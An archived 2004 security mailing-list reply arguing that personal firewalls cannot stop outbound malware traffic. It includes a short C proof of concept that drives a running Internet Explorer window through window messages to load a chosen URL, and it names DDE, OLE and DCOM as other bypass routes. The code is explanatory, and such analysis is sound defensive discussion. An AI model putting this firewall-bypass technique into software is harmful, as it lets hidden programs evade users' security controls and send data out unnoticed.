Home page logo

basics logo Security Basics mailing list archives

Re: Windows Messenger Pop-up spam
From: Ansgar -59cobalt- Wiechers <bugtraq () planetcobalt net>
Date: Thu, 9 Dec 2004 23:43:51 +0100

On 2004-12-09 Michael Painter wrote:
On 2004-12-08 "Ansgar -59cobalt- Wiechers" wrote:
You need to think in terms of users who aren't as savvy as you.  You
are putting absolutley no outbound checks in place.

Those checks are useless if the malware isn't as braindead as
Personal Firewalls are. Like I said above: it takes 25 LoC to sneak
around them. *All* of them.

Could you talk a little more about this?
ZoneAlarm Pro alerts me when IE6 has been changed, so I'd like to
understand exactly what you're saying (not asking for the code,

IE doesn't get changed. You simply find a running instance of IE (or
create a new one) and send window messages (a form of IPC, has nothing
to do with the messenger service) to specific subwindows.

There's nothing secret about the code, BTW. Here's a basic example
written by a friend of mine that shows the principle without creating an
IE instance or hiding the IE window (both can be done with a few more

int WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance,
            LPSTR lpCmdLine, int nCmdShow) {
  HWND ie = FindWindowEx(NULL, NULL, "IEFrame", NULL);
  HWND wrk, tb, cbx, cb, url;

  if (ie == NULL) {
    MessageBox(NULL, "Run IE, or else.", "Huhu!", MB_OK | MB_ICONEXCLAMATION); 
    return 0;

  wrk = FindWindowEx(ie, NULL, "WorkerW", NULL);
  tb  = FindWindowEx(wrk, NULL, "ReBarWindow32", NULL);
  cbx = FindWindowEx(tb, NULL, "ComboBoxEx32", NULL);
  cb  = FindWindowEx(cbx, NULL, "ComboBox", NULL);
  url = FindWindowEx(cb, NULL, "Edit", NULL);

  SendMessage(url, WM_SETTEXT, NULL, "http://www.dingens.org";);
  PostMessage(url, WM_SETFOCUS, 0, 0);
  PostMessage(url, WM_KEYDOWN, VK_RETURN, 0);

  return 0;

To prevent this kind of attack, you would have to completely change the
way the windowing system of Windows works. And that's just one attack
vector. There are many others like DDE, OLE (this is used by tooleaky
IIRC) and (D)COM. Plus many PFWs have their config files world-writable
and "protect" them by just locking them. That's why PFWs are useless.

Ansgar Wiechers
"Those who would give up liberty for a little temporary safety
deserve neither liberty nor safety, and will lose both."
--Benjamin Franklin

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]